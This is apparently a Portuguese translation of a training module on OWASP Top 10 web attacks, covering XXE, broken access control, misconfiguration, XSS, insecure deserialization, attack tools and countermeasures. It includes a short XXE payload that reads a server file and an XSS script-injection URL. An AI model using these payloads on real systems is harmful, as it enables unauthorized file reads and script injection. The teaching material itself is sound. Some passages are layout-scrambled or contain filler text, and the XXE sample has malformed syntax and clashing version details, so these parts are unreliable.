Muitos aplicativos da Web não protegem seus dados confidenciais adequadamente contra usuários não autorizados.
Os aplicativos da Web usam algoritmos criptográficos para criptografar seus dados e outras informações confidenciais que
precisam ser transferidas do servidor para o cliente ou vice-versa. A exposição de dados confidenciais ocorre devido a
falhas como armazenamento criptográfico inseguro e vazamento de informações.
Mesmo que os dados sejam criptografados, alguns métodos de criptografia criptográfica têm pontos fracos inerentes,
permitindo que invasores explorem e roubem os dados. Quando um aplicativo usa código de criptografia mal escrito para
criptografar e armazenar dados confidenciais no banco de dados, o invasor pode facilmente explorar essa falha e roubar
ou modificar dados confidenciais mal protegidos, como números de cartões de crédito, SSNs e outras credenciais de
autenticação. Assim, eles podem lançar novos ataques, como roubo de identidade e fraude de cartão de crédito.
Os desenvolvedores podem evitar esses ataques usando algoritmos adequados para criptografar dados confidenciais. Ao
mesmo tempo, os desenvolvedores devem tomar cuidado para armazenar as chaves criptográficas com segurança. Se
essas chaves forem armazenadas em locais inseguros, os invasores poderão recuperá-las facilmente e descriptografar os
dados confidenciais. O armazenamento inseguro de chaves, certificados e senhas também permite que o invasor obtenha
acesso ao aplicativo da Web como um usuário legítimo. A exposição de dados confidenciais pode causar graves prejuízos
a uma empresa. Portanto, as organizações devem proteger todas as suas fontes, como sistemas ou outros recursos de
rede, contra vazamento de informações, empregando mecanismos adequados de filtragem de conteúdo.

As capturas de tela abaixo mostram um código vulnerável mal criptografado e um código seguro criptografado
corretamente usando um algoritmo criptográfico seguro.
Figura 7.22: Exemplo de código vulnerável
Figura 7.23: Exemplo de código seguro

A4 - Entidade Externa XML (XXE)

ÿ Ataque de entidade externa XML é um ataque de falsificação de solicitação do lado do servidor (SSRF) que pode ocorrer
quando um analisador XML mal configurado permite que os aplicativos analisem a entrada XML de uma fonte não confiável
ÿ Os invasores podem encaminhar o aplicativo da Web da vítima para uma entidade externa, incluindo a referência na entrada
XML maliciosa
ÿ Quando essa entrada maliciosa é processada pelo analisador XML mal configurado de um aplicativo da Web de destino,
ela permite que o invasor acesse arquivos e serviços protegidos de servidores ou redes conectadas
Solicitação maliciosa:
POST http://certifiedhacker.com/xml
HTTP/1.1 <!DOCTYPE foo [ <!ELEMENT
foo ANY> <!ENTITY bar SYSTEM www.certifiedhacker.com
"file:///etc/lsb-release"> ]> <foo>
&bar; </foo>
Atacante Resposta: Do utilizador

HTTP/1.0 200 OK
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=xenial
Aplicativo da Web com fraca
DISTRIB_DESCRIPTION="Ubuntu 18.04 LTS"
Analisador XML Configurado
A4 - Entidade Externa XML (XXE)
Um ataque de entidade externa XML é um ataque de falsificação de solicitação do lado do servidor (SSRF)
em que um aplicativo pode analisar a entrada XML de uma fonte não confiável devido ao analisador XML
mal configurado. Nesse ataque, um invasor envia uma entrada XML maliciosa contendo uma referência a
uma entidade externa para o aplicativo da Web da vítima. Quando essa entrada maliciosa é processada por
um analisador XML mal configurado do aplicativo da Web de destino, ela permite que o invasor acesse
arquivos e serviços protegidos de servidores ou redes conectadas.
Como os recursos XML estão amplamente disponíveis, o invasor abusa desses recursos para criar
documentos ou arquivos dinamicamente no momento do processamento. Os invasores tendem a aproveitar
ao máximo esse ataque, pois permite que eles recuperem dados confidenciais, executem ataques DoS e
obtenham informações confidenciais via HTTP(S); em alguns cenários de pior caso, eles podem até executar
a execução remota de código ou lançar um ataque CSRF em qualquer serviço vulnerável.
De acordo com o padrão XML 1.0, o XML usa entidades geralmente definidas como unidades de
armazenamento. As entidades são recursos especiais do XML que podem acessar conteúdos locais ou
remotos e são definidas em qualquer lugar de um sistema por meio de identificadores de sistema. As
entidades não precisam fazer parte de um documento XML, pois também podem vir de um sistema externo.
Os identificadores do sistema que atuam como URI são usados pelo processador XML durante o
processamento da entidade. O processo de análise XML substitui essas entidades por seus dados reais e,
aqui, o invasor explora essa vulnerabilidade forçando o analisador XML a acessar o arquivo ou o conteúdo
especificado por ele. Esse ataque pode ser mais perigoso como um aplicativo confiável; o processamento de
documentos XML pode ser abusado pelo invasor para girar o sistema interno para adquirir todos os tipos de dados internos do

Por exemplo, o invasor envia o seguinte código para extrair os dados do sistema do alvo
vulnerável.
Figura 7.24: Ataque XML External Entity (XXE)

A5 - Controle de acesso quebrado
ÿ O controle de acesso quebrado é um método no qual um invasor identifica uma falha

relacionada ao controle de acesso e burla a autenticação, o que permite que ele comprometa a rede
ÿ Permite que um invasor atue como usuário ou administrador com funções privilegiadas e
criar, acessar, atualizar ou excluir todos os registros
http://www.certifiedhacker.com/
Acesso concedido
Solicitar Solicitar
Usuários privilegiados
Controle de acesso
Aplicativo Web
Acesso
Acesso negado
Negado
A5 - Controle de acesso quebrado
O controle de acesso refere-se a como um aplicativo da Web concede acesso para criar, atualizar e excluir qualquer
registro/conteúdo ou função para alguns usuários privilegiados enquanto restringe o acesso a outros usuários.
O controle de acesso quebrado é um método no qual um invasor identifica uma falha relacionada ao controle de
acesso, ignora a autenticação e, então, compromete a rede. Os pontos fracos do controle de acesso são comuns
devido à falta de detecção automatizada e testes funcionais eficazes pelos desenvolvedores de aplicativos. Eles
permitem que os invasores atuem como usuários ou administradores com funções privilegiadas e criem, acessem,
atualizem ou excluam qualquer registro.
De acordo com a revisão OWASP 2017 R2, o controle de acesso quebrado é uma combinação de referência de objeto
direto insegura e controle de acesso de nível de função ausente.
ÿ Referências de objeto diretas inseguras: quando os desenvolvedores expõem vários objetos de

implementação interna, como arquivos, diretórios, registros de banco de dados ou referências de chave, o
resultado é uma referência de objeto direta insegura. Por exemplo, se um número de conta bancária for uma
chave primária, existe a chance de o aplicativo ser comprometido por invasores que se aproveitam dessas
referências.
ÿ Controle de acesso de nível de função ausente: em alguns aplicativos da Web, a proteção de nível de
função é gerenciada por meio de configuração e os invasores exploram essas falhas de controle de acesso
de nível de função para acessar funcionalidades não autorizadas. Os principais alvos dos atacantes neste
cenário são as funções administrativas. Os desenvolvedores devem incluir verificações de código adequadas
para evitar tais ataques. Detectar essas falhas é fácil para um invasor; no entanto, identificar as funções
vulneráveis ou páginas da Web (URLs) a serem atacadas é consideravelmente difícil.

Figura 7.25: Ataque de controle de acesso quebrado

A6 - Configuração incorreta de segurança
Entradas não validadas

Refere-se a uma vulnerabilidade de aplicativo da Web em que a entrada de um cliente
não é validada antes de ser processada por aplicativos da Web e servidores de back-end
Tamperação de Parâmetro/Forma
Envolve a manipulação de parâmetros trocados entre cliente e servidor para modificar
os dados do aplicativo
Manipulação de erro imprópria

Fornece informações sobre o código-fonte , como falhas lógicas e contas padrão.
Usando as informações recebidas de uma mensagem de erro, um invasor identifica
vulnerabilidades para iniciar vários ataques a aplicativos da web
Proteção insuficiente da camada de transporte

Ele suporta algoritmos fracos e usa certificados expirados ou inválidos. O uso
insuficiente da proteção da camada de transporte expõe os dados do usuário a terceiros
não confiáveis e pode levar ao roubo da conta
A6 - Configuração incorreta de segurança
Os desenvolvedores e administradores de rede devem garantir que toda uma pilha de aplicativos seja configurada
corretamente; caso contrário, a configuração incorreta de segurança pode ocorrer em qualquer nível da pilha,
incluindo sua plataforma, servidor web, servidor de aplicativos, estrutura e código personalizado. Por exemplo, se
o desenvolvedor não configurar o servidor corretamente, isso pode resultar em vários problemas que podem afetar
a segurança do site. Os problemas que levam a tais instâncias incluem entradas não validadas, adulteração de
parâmetros/formulários, tratamento inadequado de erros, proteção insuficiente da camada de transporte, etc.
ÿ Entradas Não Validadas
As falhas de validação de entrada referem-se a uma vulnerabilidade de aplicativo da Web em que a

entrada de um cliente não é validada antes de ser processada por aplicativos da Web e servidores de back-end.
Nenhuma validação ou validação imprópria pode tornar um aplicativo da Web vulnerável a vários ataques
de validação de entrada. Se os aplicativos da Web implementam a validação de entrada apenas no lado
do cliente, os invasores podem ignorá-la facilmente adulterando as solicitações HTTP, URLs, cabeçalhos,
campos de formulário, campos ocultos e strings de consulta. Os IDs de login dos usuários e outros dados
relacionados são armazenados nos cookies, que se tornam um meio de ataque. Um invasor explora falhas
de validação de entrada para executar scripts entre sites, estouro de buffer, ataques de injeção etc.,
resultando em roubo de dados e mau funcionamento do sistema.

Figura 7.26: Ataque de entrada não validada
ÿ Tamperação de Parâmetros/Formas
Um ataque de adulteração de parâmetros da web envolve a manipulação de parâmetros trocados entre o

cliente e o servidor para modificar dados do aplicativo, como credenciais e permissões do usuário, preços e
quantidades de produtos. Na verdade, essas informações são armazenadas em cookies, campos de formulário
ocultos ou strings de consulta de URL. O aplicativo da web o utiliza para aumentar sua funcionalidade e
controle. Um ataque man-in-the-middle (MITM) é um exemplo desse tipo de ataque. Os invasores usam
ferramentas como WebScarab e WebSploit Framework para esses ataques.
A adulteração de parâmetros é um tipo simples de ataque direcionado diretamente à lógica de negócios de um

aplicativo. Ele aproveita o fato de que muitos programadores dependem de campos ocultos ou fixos (como
uma tag oculta em um formulário ou um parâmetro em uma URL) como a única medida de segurança para
determinadas operações. Para contornar esse mecanismo de segurança, um invasor pode alterar esses
parâmetros. Um ataque de adulteração de parâmetros explora vulnerabilidades nos mecanismos de integridade
e validação lógica que podem resultar em XSS, injeção de SQL, etc.
Figura 7.27: Exemplo de ataque de adulteração de parâmetro
ÿ Tratamento Inadequado de Erros
É necessário definir como um sistema ou rede deve se comportar quando ocorre um erro.
Caso contrário, o erro pode fornecer uma chance para um invasor invadir o sistema.
O tratamento inadequado de erros pode levar a ataques DoS.

O tratamento inadequado de erros fornece informações sobre o código-fonte, como falhas lógicas e contas padrão,
que o invasor pode explorar. Usando as informações recebidas de uma mensagem de erro, um invasor identifica
vulnerabilidades para iniciar vários ataques a aplicativos da web. O tratamento inadequado de exceções ocorre quando
os aplicativos da Web não limitam a quantidade de informações que retornam aos seus usuários. O vazamento de
informações pode incluir mensagens de erro úteis e banners de serviço. Os desenvolvedores e administradores de
sistema geralmente esquecem ou desconsideram como um invasor pode usar algo tão simples quanto um banner de
servidor. O invasor começará a procurar um local para identificar vulnerabilidades e tentará aproveitar as informações
fornecidas livremente pelos aplicativos.
Figura 7.28: Captura de tela exibindo erros impróprios
O invasor pode coletar as seguintes informações do tratamento inadequado de erros:
o Exceções de ponteiro nulo
o Falha na chamada do sistema
o Banco de dados indisponível
o Tempo limite da rede
o Informações do banco de dados
o Fluxo lógico do aplicativo da Web
o Ambiente de aplicação
ÿ Proteção insuficiente da camada de transporte
A proteção insuficiente da camada de transporte é uma falha de segurança que ocorre quando um aplicativo falha em
proteger o tráfego sensível que flui em uma rede. Ele suporta algoritmos fracos e usa certificados expirados ou
inválidos. Os desenvolvedores devem usar autenticação SSL/TLS para autenticação nos sites; caso contrário, um
invasor pode monitorar o tráfego de rede.
A menos que a comunicação entre sites e clientes seja criptografada, os dados podem ser

interceptados, injetados ou redirecionados. Uma configuração SSL sem privilégios também pode
ajudar o invasor a lançar ataques de phishing e MITM.
O comprometimento do sistema pode levar a várias outras ameaças, como roubo de conta, ataques
de phishing e contas de administrador comprometidas. Assim, a proteção insuficiente da camada de
transporte pode permitir que terceiros não confiáveis obtenham acesso não autorizado a informações
confidenciais. Tudo isso ocorre quando os aplicativos suportam algoritmos fracos usados para SSL e
quando eles usam certificados SSL expirados ou inválidos ou não os usam corretamente.

A7 - Ataques Cross-Site Scripting (XSS)

Como funcionam os ataques XSS
ÿ Cross-site scripting ('XSS' ou Solicitação normal Este exemplo usa uma página
vulnerável, que lida com
Ataques 'CSS') exploram solicitações de páginas
http://certifiedhacker.com/
vulnerabilidades em jason_file.html inexistentes: uma clássica página de erro 404
páginas da Web geradas 404 não encontrado

dinamicamente, permitindo que
(Lida com os pedidos
invasores mal-intencionados injetem /jason_file.html Código do servidor por um inexistente
Resposta do Servidor
<html> page: uma clássica
scripts do lado do cliente em páginas
página de erro 404)
<corpo>
da Web visualizadas por outros usuários <? php
print "Não encontrado: " .
Código de Ataque XSS urldecode($_SERVER[“
ÿ Ocorre quando dados de entrada não REQUEST_URI"]);
?>
validados são incluídos no conteúdo </body> </
Resposta do servidor
html> Servidor
dinâmico que é enviado ao 404 não encontrado
navegador da web de um usuário
para renderização
http://certifiedhacker.com/<script> alert(“AVISO:
O aplicativo encontrou um erro");</script>
A7 - Ataques Cross-Site Scripting (XSS)
Os ataques de script entre sites (XSS ou CSS) exploram vulnerabilidades em páginas da Web geradas dinamicamente, o que
permite que invasores mal-intencionados injetem scripts do lado do cliente em páginas da Web visualizadas por outros usuários.
Esses ataques ocorrem quando dados de entrada invalidados são incluídos no conteúdo dinâmico enviado ao navegador da
web de um usuário para renderização. Os invasores injetam JavaScript, VBScript, ActiveX, HTML ou Flash maliciosos para
execução no sistema da vítima, ocultando-os em solicitações legítimas. Os invasores contornam os mecanismos de segurança
do ID do cliente, obtêm privilégios de acesso e injetam scripts maliciosos em páginas da Web específicas. Esses scripts
maliciosos podem até reescrever o conteúdo do site em HTML.
Algumas explorações que podem ser realizadas por ataques XSS são as seguintes:
ÿ Execução de script malicioso ÿ Sequestro de sessão
ÿ Redirecionamento para um servidor malicioso ÿ Quebra de senha de força bruta
ÿ Exploração de privilégios de usuário ÿ Roubo de dados
ÿ Anúncios em IFRAMES e pop-ups ocultos ÿ Sondagem de Intranet
ÿ Manipulação de dados ÿ Keylogging e monitoramento remoto
Como funcionam os ataques XSS
Uma página da Web consiste em marcação de texto e HTML criada pelo servidor e obtida pelo navegador do cliente. Os
servidores podem controlar a interpretação do cliente sobre as páginas geradas estaticamente, mas não podem controlar
completamente a interpretação do cliente sobre a saída da página gerada dinamicamente pelos servidores. Assim, se o invasor
inserir conteúdo não confiável em uma página dinâmica, nem o servidor nem o cliente o reconhecerão. A entrada não confiável
pode vir de parâmetros de URL, elementos de formulário, cookies, consultas de banco de dados e assim por diante.

Se os dados dinâmicos inseridos pelo servidor da Web contiverem caracteres especiais, o

navegador da Web do usuário os confundirá com marcação HTML, pois trata alguns caracteres
como especiais para distinguir o texto da marcação. Assim, um invasor pode escolher os dados
inseridos na página gerada e induzir o navegador do usuário a executar o script do invasor.
Como os scripts maliciosos serão executados no contexto de segurança do navegador para se
comunicar com o servidor da Web legítimo, o invasor terá acesso completo ao documento
recuperado e poderá enviar os dados da página de volta ao seu site.
Figura 7.29: Demonstração do ataque XSS

A8 - Desserialização Insegura
ÿ Serialização de dados e
Funcionário
a desserialização é um
processo eficaz de
linearização e
deslinearização de objetos
Nome Idade EmpID
de dados para transmissão a Cidade
Atacante
outras redes ou sistemas Rinne 26 Nevada 2201
Injeta código malicioso em

ÿ Os invasores injetam Serialização dados serializados
código malicioso em
dados serializados e
<Employee><Name>Rinni</Name><Age>26</Age><City> <Employee><Name>Rinni</Name><Age>26</Age><City>Nevada
encaminhar os dados Nevada</City><EmpID>2201</EmpID></Employee> </City><EmpID>2201</EmpID> PROCEDIMENTO MALICIOSO</Employee>
serializados maliciosos para o

vítima Inseguro
Desserialização
Desserialização
ÿ A desserialização insegura
desserializa o conteúdo Malicioso
Funcionário Funcionário Procedimento
serializado malicioso junto hackear
com o código malicioso

injetado, comprometendo o
sistema ou a rede
Nome Idade Cidade EmpID Nome Idade Cidade EmpID
Rinne 26 Nevada 2201 Rinne 26 Nevada 2201
A8 - Desserialização Insegura
Como os dados no computador são armazenados na forma de estruturas de dados (gráfico, árvores, matriz, etc.), a
serialização e desserialização de dados é um processo eficaz para linearizar e deslinearizar objetos de dados para
transportá-los para outras redes ou sistemas.
ÿ Serialização
Considere um exemplo de objeto “Funcionário” (para plataforma JAVA), onde o objeto Funcionário consiste em
dados como nome, idade, cidade e EmpID. Devido ao processo de serialização, os dados do objeto serão
convertidos no seguinte formato linear para transporte para diferentes sistemas ou diferentes nós de uma rede.
<Employee><Name>Rinni</Name><Age>26</Age><City>Nevada</City><EmpID>2201
</EmpID></Funcionário>
Figura 7.30: Processo de serialização

ÿ Desserialização
A desserialização é o processo inverso da serialização, pelo qual os dados do objeto são recriados a partir
dos dados serializados lineares. Devido ao processo de desserialização, o objeto Employee serializado dado
no exemplo acima será reconvertido nos dados do objeto conforme a figura abaixo:
Figura 7.31: Processo de desserialização
ÿ Desserialização Insegura
Esse processo de serialização e desserialização é efetivamente usado na comunicação entre redes, e seu
uso generalizado atrai invasores para explorar as falhas desse processo. Os invasores injetam código
malicioso em dados formatados lineares serializados e encaminham os dados serializados maliciosos para a
vítima. Um exemplo de injeção de código malicioso em dados lineares serializados pelo invasor é mostrado
abaixo:
<Employee><Name>Rinni</Name><Age>26</Age><City>Nevada
</City><EmpID>2201</EmpID> PROCEDIMENTO MALICIOSO</Employee>
Devido à desserialização insegura, o código malicioso injetado não será detectado e permanecerá presente
na execução final do código de desserialização. Isso resulta na execução de procedimentos maliciosos
juntamente com a execução de dados serializados, conforme mostra a figura a seguir:

Figura 7.32: Ataque de desserialização insegura
Isso poderia ter um impacto severo no sistema, pois autorizaria o invasor a executar e
executar sistemas remotamente. Além disso, qualquer software ou servidor vulnerável a
ataques de desserialização pode ser afetado negativamente.

A9 - Usando Componentes com Vulnerabilidades Conhecidas
ÿ A maioria das aplicações web que usam componentes como

bibliotecas e frameworks sempre os executa com
privilégios totais, e falhas em qualquer componente
podem resultar em sérios impactos
ÿ Os invasores podem identificar componentes

fracos ou dependências por meio de varredura
ou análise manual
ÿ Os invasores procuram vulnerabilidades em sites de

exploração, como Exploit Database (https:// www.exploit-
db.com) e SecurityFocus (https:// www.securityfocus.com)
ÿ Se um componente vulnerável for identificado, o

o invasor personaliza a exploração conforme necessário
e executa o ataque
https:// www.exploit-db.com
A9 - Usando Componentes com Vulnerabilidades Conhecidas

Componentes como bibliotecas e estruturas usados na maioria dos aplicativos da Web sempre são
executados com privilégios totais, e falhas em qualquer componente podem ter consequências graves.
Os invasores podem identificar componentes fracos ou dependências por meio de varredura ou análise
manual. Os invasores procuram vulnerabilidades em sites de exploração, como Exploit Database
(https:// www.exploit-db.com), Security Focus (https:// www.securityfocus.com) e Zero Day Initiative
(https:// www. .zerodayinitiative.com). Se um componente vulnerável for identificado, o invasor
personaliza a exploração conforme necessário e executa o ataque. A exploração bem-sucedida permite
que o invasor cause sérias perdas de dados ou assuma o controle dos servidores. Um invasor
geralmente usa sites de exploração para identificar as explorações de aplicativos da Web ou executa
a verificação de vulnerabilidades usando ferramentas como Nessus e GFI LanGuard para identificar
os componentes vulneráveis existentes.
Figura 7.33: Ataque a um aplicativo da web com componentes vulneráveis conhecidos

Figura 7.34: captura de tela exibindo os resultados da pesquisa do banco de dados de exploits para exploits de aplicativos da web

A10 - Registro e Monitoramento Insuficientes

ÿ Os aplicativos da Web mantêm registros para rastrear padrões de uso, como credenciais de login do usuário e credenciais de login do
administrador ÿ Registro e monitoramento insuficientes referem-se ao cenário em que o software de detecção não registra o
evento malicioso ou ignora detalhes importantes sobre o evento
ÿ Os invasores geralmente injetam, excluem ou adulteram os logs de aplicativos da web para se envolver em atividades maliciosas ou ocultar seus
identidades
tentativas maliciosas www.certifiedhacker.com
Obtenha
acesso a dados
confidenciais sem ser notado
Atacante Base de dados
Aplicativo da Web com registro insuficiente
A10 - Registro e Monitoramento Insuficientes

Os aplicativos da Web mantêm registros para rastrear padrões de uso, como credenciais de login do
usuário e credenciais de login do administrador. Registro e monitoramento insuficientes referem-se a
cenários nos quais o software de detecção não registra o evento malicioso ou ignora os detalhes
importantes sobre o evento. Os invasores geralmente injetam, excluem ou adulteram os logs de
aplicativos da web para se envolver em atividades maliciosas ou ocultar suas identidades. Devido ao
registro e monitoramento insuficientes, a detecção de tentativas maliciosas do invasor se torna mais
difícil e o invasor pode realizar ataques maliciosos, como força bruta de senha, para roubar senhas confidenciais.
Figura 7.35: Ataque a um aplicativo da Web com registro e monitoramento insuficientes

Ferramentas de ataque de aplicativos da Web
Oferece suporte a todo o processo de teste de aplicativos da Web, desde o mapeamento inicial e a análise da
Suíte Burp superfície de ataque de um aplicativo até a localização e exploração de vulnerabilidades de segurança
Ferramentas de ataque a aplicativos da Web (continuação)
OWASP Zed Fornece scanners e ferramentas automatizados

Proxy de ataque que permitem encontrar vulnerabilidades de
segurança manualmente
ÿ Metasploit (https:// www.metasploit.com)
ÿ w3af (http:// w3af.org)
ÿ Sn1per (https:// github.com)
ÿ WSSiP (https:// github.com)
As seções anteriores deste módulo discutem os diferentes tipos de ataques e ameaças a aplicativos da Web que permitem
que os invasores se envolvam em ataques bem-sucedidos a aplicativos da Web de destino. Posteriormente, o módulo
discute várias ferramentas de ataque de aplicativos da Web que os invasores usam para realizar esses ataques.

ÿ Suite Burp
Fonte: https:// portswigger.net
Burp Suite é uma plataforma integrada para realizar testes de segurança de aplicações web.
Ele possui várias ferramentas que trabalham juntas para dar suporte a todo o processo de teste, desde o
mapeamento inicial e análise da superfície de ataque de um aplicativo até a descoberta e exploração de
vulnerabilidades de segurança.
Ferramentas integradas do Burp Suite
o Proxy de interceptação para inspecionar e modificar o tráfego entre seu navegador e

o aplicativo de destino
o Spider com reconhecimento de aplicativos para rastreamento de conteúdo e funcionalidade
o Verificador de aplicativos da Web para automatizar a detecção de vários tipos de

vulnerabilidades
o Ferramenta de invasão para realizar ataques personalizados para encontrar e explorar

vulnerabilidades
o Ferramenta repetidora para manipulação e reenvio de solicitações individuais
o Ferramenta de sequenciador para testar a aleatoriedade dos tokens de sessão
Figura 7.36: Captura de tela do Burp Suite

ÿ Proxy de Ataque Zed OWASP
Fonte: https:// www.owasp.org
OWASP Zed Attack Proxy (ZAP) é uma ferramenta integrada de teste de penetração para encontrar
vulnerabilidades em aplicativos da web. Ele oferece verificadores automatizados, bem como um conjunto
de ferramentas que permitem encontrar vulnerabilidades de segurança manualmente. Os invasores usam
o OWASP ZAP para web spidering/crawling para identificar o conteúdo oculto e a funcionalidade no
aplicativo da web de destino.
Figura 7.37: Captura de tela do OWASP ZAP
Algumas ferramentas adicionais de ataque a aplicativos da web são as
seguintes: ÿ Metasploit (https:// www.metasploit.com)
ÿ w3af (http:// w3af.org)
ÿ Sn1per (https:// github.com) ÿ WSSiP
(https:// github.com)

Fluxo do módulo

Ameaças e Ataques
2
Pilha
1 3 Discutir aplicativo da Web
Discutir contramedidas de ataque a aplicativos da Web

Depois de aprender várias técnicas adotadas pelos invasores para executar ataques de aplicativos da
Web, é importante aprender como proteger esses aplicativos de tais ataques. Uma análise cuidadosa
da segurança ajudará um profissional de segurança a proteger os aplicativos. Para fazer isso, deve-
se projetar, desenvolver e configurar aplicativos da Web usando as contramedidas e técnicas
discutidas neste módulo.

Contramedidas de ataque a aplicativos da Web
Ataques de injeção SQL

ÿ Limite o comprimento da entrada do usuário
ÿ Use mensagens de erro personalizadas ÿ
Monitore o tráfego do banco de dados usando um IDS, WAF
O cliente é muito
importante, o cliente Falhas de Injeção de Comando
será seguido pelo cliente.
ÿ Executar validação de entrada
Até que a fringilla foi maleduca
ante o triste ullamcorper. Em ÿ Escape de caracteres perigosos ÿ Use
vulputate nenhum dos dois. bibliotecas específicas da linguagem que evitam problemas devido a comandos shell
Ataques de injeção de LDAP

ÿ Execute validação de tipo, padrão e valor de domínio em todos os dados de entrada ÿ Torne o filtro
LDAP o mais específico possível
ÿ Validar e restringir a quantidade de dados retornados ao usuário
Contramedidas de ataque a aplicativos da Web (continuação)

Autenticação e sessão quebradas
Exposição de dados confidenciais
Gerenciamento
Use SSL para partes autenticadas do aplicativo Não crie ou use algoritmos criptográficos fracos
Verifique se todas as identidades e credenciais dos usuários estão Gere chaves de criptografia offline e armazene-as com segurança
armazenadas em forma de hash
Nunca envie dados de sessão como parte de um GET, POST Certifique-se de que os dados criptografados armazenados no disco não sejam fáceis
de descriptografar
Entidade Externa XML Controle de acesso quebrado
Evite o processamento de entrada XML contendo referência a Execute verificações de controle de acesso antes de redirecionar o
entidade externa por analisador XML mal configurado usuário autorizado para o recurso solicitado
O unmarshaller XML deve ser configurado com segurança Evite usar IDs inseguros para evitar que invasores os
adivinhem
Analisar o documento com um analisador configurado com segurança
Forneça um mecanismo de tempo limite de sessão

Configuração incorreta de segurança Ataques XSS
ÿ Configure todos os mecanismos de segurança e ÿ Valide todos os cabeçalhos, cookies, consultas

desative todos os serviços não utilizados strings, campos de formulário e campos ocultos
(ou seja, todos os parâmetros) em relação a uma
ÿ Configurar funções, permissões e contas e desativar especificação rigorosa ÿ Use ferramentas de teste
todas as contas padrão ou alterar suas senhas
extensivamente durante a fase de design para eliminar
padrão essas lacunas de XSS no aplicativo
ÿ Procure as vulnerabilidades de segurança mais recentes

ÿ Use um firewall de aplicativo da web para bloquear a
e aplique os patches de segurança mais recentes
execução de scripts maliciosos
ÿ Converter todos os caracteres não alfanuméricos

ÿ Solicitações não SSL para páginas da Web devem ser
caracteres para entidades de caracteres HTML
redirecionadas para a página SSL
antes de exibir a entrada do usuário nos
mecanismos de pesquisa
Usando componentes com Registro Insuficiente

Desserialização insegura
Vulnerabilidades conhecidas & Monitoramento
ÿ Valide a entrada não confiável que deve ÿ Verifique regularmente as versões ÿ Definir o escopo dos ativos
ser serializada para garantir que os de componentes do lado do coberto no monitoramento de log
dados serializados contenham apenas cliente e do lado do servidor e suas para incluir áreas críticas de negócios
classes confiáveis dependências
ÿ Configure uma linha de base mínima para
ÿ Monitorar continuamente
ÿ A desserialização de dados confiáveis registro e garanta que ela seja seguida
fontes como o banco de dados
deve cruzar um limite de confiança para todos os ativos
nacional de vulnerabilidade
(NVB) para vulnerabilidades em
ÿ Os desenvolvedores devem reprojetar ÿ Certifique-se de que os logs sejam registrados
seus componentes
seus aplicativos com o contexto do usuário, para que os logs
ÿ Aplique patches de segurança sejam rastreáveis para usuários específicos
regularmente
Contramedidas de ataque a aplicativos da Web
ÿ Ataques de Injeção de SQL
o Limite o comprimento da entrada do usuário
o Use mensagens de erro personalizadas
o Monitore o tráfego do banco de dados usando um IDS, WAF

o Desabilitar comandos como xp_cmdshell
o Isole o servidor de banco de dados e o servidor web
o Sempre use um conjunto de atributos de método para POST e uma conta com poucos privilégios para DB
conexão
o Execute uma conta de serviço de banco de dados com direitos mínimos
o Mover procedimentos armazenados estendidos para um servidor isolado
o Use variáveis ou funções typesafe como isNumeric() para garantir typesafety
o Validar e higienizar as entradas do usuário passadas para o banco de dados
o Evite usar SQL dinâmico e não construa consultas com a entrada do usuário
o Use declarações preparadas, consultas parametrizadas ou procedimentos armazenados para acessar

o banco de dados
o Exibir menos informações e usar o modo customErrors "RemoteOnly" para exibir

mensagens de erro detalhadas na máquina local
o Efetuar escape e filtragem de caracteres adequados para evitar caracteres e símbolos de string especiais, como
aspas simples (')
o Sempre defina a lista branca logicamente em vez da lista negra para evitar códigos ruins
o Utilizar frameworks Object Relational Mapping (ORM) para fazer a conversão de SQL
conjuntos de resultados em objetos de código mais consistentes
ÿ Falhas de Injeção de Comando
o Realizar validação de entrada
o Fuja de personagens perigosos
o Use bibliotecas específicas da linguagem que evitam problemas devido a comandos shell
o Realizar codificação de entrada e saída
o Use uma API segura que evite totalmente o uso do interpretador
o Estruture as solicitações para que todos os parâmetros fornecidos sejam tratados como dados em vez de
conteúdo potencialmente executável
o Use consultas SQL parametrizadas
o Use dissociação de shell modular do kernel
o Use funções de biblioteca integradas e evite chamar comandos do sistema operacional diretamente
o Implemente o mínimo de privilégios para restringir as permissões para executar o sistema operacional
comandos
o Evite executar comandos como exec ou system sem a devida validação e

sanitização

o Evite o interpretador de shell usando pcntl_fork e pcntl_exec dentro do PHP
o Implementar Python como uma estrutura da Web em vez de PHP para desenvolvimento de aplicativos
ÿ Ataques de injeção de LDAP
o Realizar validação de tipo, padrão e valor de domínio em todos os dados de entrada
o Torne o filtro LDAP o mais específico possível
o Validar e restringir a quantidade de dados retornados ao usuário
o Implementar controle de acesso rígido aos dados no diretório LDAP
o Realizar testes dinâmicos e análise de código-fonte
o Sanitize todas as entradas do usuário final e escape de quaisquer caracteres especiais
o Evite construir filtros de pesquisa LDAP concatenando strings
o Use o filtro AND para impor restrições em entradas semelhantes
o Use LDAPS (LDAP sobre SSL) para criptografar e proteger a comunicação no

servidores web
ÿ Autenticação quebrada e gerenciamento de sessão
o Use SSL para todas as partes autenticadas do aplicativo
o Verifique se todas as identidades e credenciais dos usuários estão armazenadas em forma de hash
o Nunca envie dados de sessão como parte de um GET, POST
o Aplique frases secretas com pelo menos cinco palavras aleatórias
o Limite as tentativas de login e bloqueie a conta por um período específico após um certo número de tentativas
malsucedidas
o Use um gerenciador de sessão de plataforma segura para gerar identificadores de sessão aleatórios longos
para desenvolvimento de sessão segura
o Implementar mecanismos de autenticação multifator para evitar adivinhação, preenchimento de credenciais e

força bruta
o Certifique-se de proteger as senhas com um algoritmo de hash de senha criptográfica ou ferramentas como
bcrypt, scrypt ou Argon2
o Certifique-se de verificar as senhas fracas em uma lista das principais senhas ruins
o Registrar falhas de autenticação e enviar alertas sempre que prováveis ataques forem detectados
ÿ Exposição de Dados Sensíveis
o Não crie ou use algoritmos criptográficos fracos
o Gere chaves de criptografia offline e armazene-as com segurança
o Certifique-se de que os dados criptografados armazenados no disco não sejam fáceis de descriptografar

o Use criptografia AES para dados armazenados e use TLS com HSTS (HTTP Strict Transport
Segurança) para o tráfego de entrada
o Classificar os dados processados, armazenados ou transmitidos por um aplicativo e aplicar

controles de acordo
o Use tokenização ou truncamento compatível com PCI DSS para remover os dados logo após sua
requerimento
o Use o gerenciamento de chaves adequado e certifique-se de que todas as chaves estejam no lugar
o Criptografe todos os dados em trânsito usando cifras TLS com Perfect Forward Secrecy (PFS)
o Desativar técnicas de cache para solicitações que contenham informações confidenciais
ÿ Entidade Externa XML
o Evite processar a entrada XML contendo referências a entidades externas por um

analisador XML configurado
o XML unmarshaller deve ser configurado com segurança
o Analisar o documento com um analisador configurado com segurança
o Configure o processador XML para usar DTD estático local e desabilitar qualquer DTD declarado
incluído em um documento XML
